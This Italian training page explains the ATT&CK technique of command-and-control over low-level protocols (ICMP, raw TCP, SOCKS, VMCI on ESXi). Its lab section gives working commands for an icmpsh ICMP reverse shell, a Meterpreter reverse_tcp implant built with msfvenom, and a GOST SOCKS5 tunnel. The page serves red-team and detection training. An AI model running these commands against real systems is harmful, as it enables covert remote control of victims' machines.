Iscriviti al webinar gratuito del 12 Maggio per diventare Forensic Analyst! Scopri di più
Corso Ethical Hacker: accedi alla promozione fino al 30 Aprile! Scopri di più
Quando un impianto malevolo deve parlare con il proprio server di comando e controllo, non è obbligato a usare HTTP o HTTPS. La tecnica Non-Application Layer Protocol descrive l'impiego di protocolli che operano ai livelli inferiori dello stack OSI — rete, trasporto, sessione — per veicolare comandi e dati esfiltrati. Il ventaglio è ampio: ICMP, usato da ping ma anche da malware come Anchor e COATHANGER per nascondere il traffico C2; TCP raw socket, scelto da decine di impianti per aggirare proxy e ispezione applicativa; UDP, SOCKS, Serial-over-LAN e perfino il VMCI (Virtual Machine Communication Interface) negli ambienti VMware ESXi.
La tecnica si colloca nella fase di Command and Control (TA0011), il momento in cui l'avversario ha già un punto d'appoggio nella rete e deve mantenerlo operativo senza farsi notare. L'attrattiva è duplice: i protocolli di basso livello generano traffico che molti stack di sicurezza ignorano, e la loro presenza sulla rete è fisiologica, il che rende complesso separare il segnale dal rumore. I numeri confermano la popolarità della tecnica: 12 gruppi APT, 86 software, 8 campagne documentate e 4 mitigazioni strutturate. In ambienti ESXi il rischio si amplifica perché il traffico VMCI non attraversa la rete fisica, risultando invisibile a strumenti di cattura tradizionali come tcpdump o Wireshark.
Il modo più diretto per comprendere questa tecnica è costruire un canale C2 su protocolli non applicativi in laboratorio e osservare cosa vede (e cosa non vede) lo stack difensivo.
Canale ICMP con icmpsh. Il tool icmpsh (open source) permette di ottenere una reverse shell che viaggia interamente su pacchetti ICMP echo/reply. Sul lato attaccante Linux si disabilita prima la risposta kernel ai ping, poi si avvia il listener:
sysctl -w net.ipv4.icmp_echo_ignore_all=1 python3 icmpsh_m.py <IP_ATTACCANTE> <IP_VITTIMA>
Sul target Windows si esegue il client icmpsh.exe, che inizia a incapsulare l'output di cmd.exe in payload ICMP. Questo scenario replica fedelmente ciò che fanno malware come PingPull, Remsec e Regin, tutti documentati con C2 su ICMP.
TCP raw socket con Cobalt Strike e Metasploit. Per simulare i numerosi impianti che usano TCP puro (PlugX, gh0st RAT, Crimson, NETWIRE), è sufficiente generare un payload Meterpreter con stager TCP bind o reverse. In Metasploit Framework (open source):
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=4444 -f exe -o implant.exe
Lato handler si configura exploit/multi/handler con lo stesso payload. Il traffico risultante è TCP puro senza header HTTP, esattamente ciò che FIN6 e Ember Bear usano in produzione. Per il red teamer è utile confrontare la visibilità: sniffando con Wireshark si noterà che il contenuto è opaco ma la connessione TCP è ben visibile — il vantaggio per l'attaccante sta nell'assenza di signature applicative, non nell'invisibilità totale.
SOCKS tunneling con GOST. Ember Bear e Gamaredon Group usano tunnel SOCKS5 per il C2. GOST — Go Simple Tunnel (open source) — replica esattamente questo scenario:
gost -L socks5://:9050
Sul lato client si configura il proxy SOCKS5 verso la porta 9050, come documentato per Gamaredon Group. Per testare il tunneling più complesso, EarthWorm (open source) offre funzionalità di port forwarding e SOCKS5 in un singolo binario, lo stesso tool impiegato da BackdoorDiplomacy.
Scenario ESXi — VMCI. Replicare il canale VMCI richiede un lab con ESXi e almeno una VM guest. Il concetto è creare un socket di tipo AF_VSOCK che connetta guest e host senza attraversare la rete fisica. UNC3886 ha usato esattamente questo approccio nella campagna RedPenguin. In laboratorio si può scrivere un PoC minimale in C/Python che apra un SOCK_STREAM su AF_VSOCK e verificare con lsof -A che il socket compaia come tipo SOCKET_VMCI — esattamente l'artefatto da cercare in detection.
Checklist rapida per il lab:
Scarica la guida gratuita e segui il percorso corretto fin dal primo passo